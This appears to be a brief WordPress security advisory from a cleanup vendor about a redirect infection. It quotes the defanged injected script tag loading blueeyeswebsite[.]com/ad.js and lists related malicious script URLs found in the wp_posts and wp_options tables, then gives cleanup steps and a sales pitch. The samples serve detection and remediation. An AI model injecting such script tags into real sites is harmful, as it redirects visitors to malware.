Malicious redirect blueeyeswebsite[.]com/ad.js

Last updated: June 04 2019

If your site is being redirected to various shady sites, you might be infected with a blueeyeswebsite SQL injection. Other common malicious scripts:

Sample code injected in wp_posts table ( wp_ prefix might differ from a site to another ):

<script src='hxxps://blueeyeswebsite[.]com/ad.js' type='text/javascript'></script> 

hxxp://blueeyeswebsite[.]com/ad.js
hxxps://forwardmytraffic[.]com/0.js
hxxps://mytemplatewebsite[.]com/0.js
hxxp://wtools[.]io/code/raw/so?
hxxp://erealitatea[.]net

These are usually injected in wp_posts or wp_options tables – wp_ table prefix might be different from one WordPress instance to another.

To prevent further data loss, you should immediate backup your database &amp; site files. If you’re unsure how to perform this action, contact your developer or hosting provider.

Second, you should revert the changes made on wp_options ( siteurl value ) &amp; wp_posts ( malicious injections ) tables. In most cases, siteurl and home should be the same.

Useful links:
Reddit, My website has started randomly forwarding to malware sites: <a href=”https://www.reddit.com/r/Wordpress/comments/a22m02/my_website_has_started_randomly_forwarding_to/”>https://www.reddit.com/r/Wordpress/comments/a22m02/my_website_has_started_randomly_forwarding_to/ </a>
Sucuri labs, Side Effects of the Site_url Hack: <a href=”https://labs.sucuri.net/?note=2018-11-20″>https://labs.sucuri.net/?note=2018-11-20 </a>
Cleanup plans: <a href=”https://www.magefix.com/pricing”>https://www.magefix.com/pricing</a>

Let us clean your site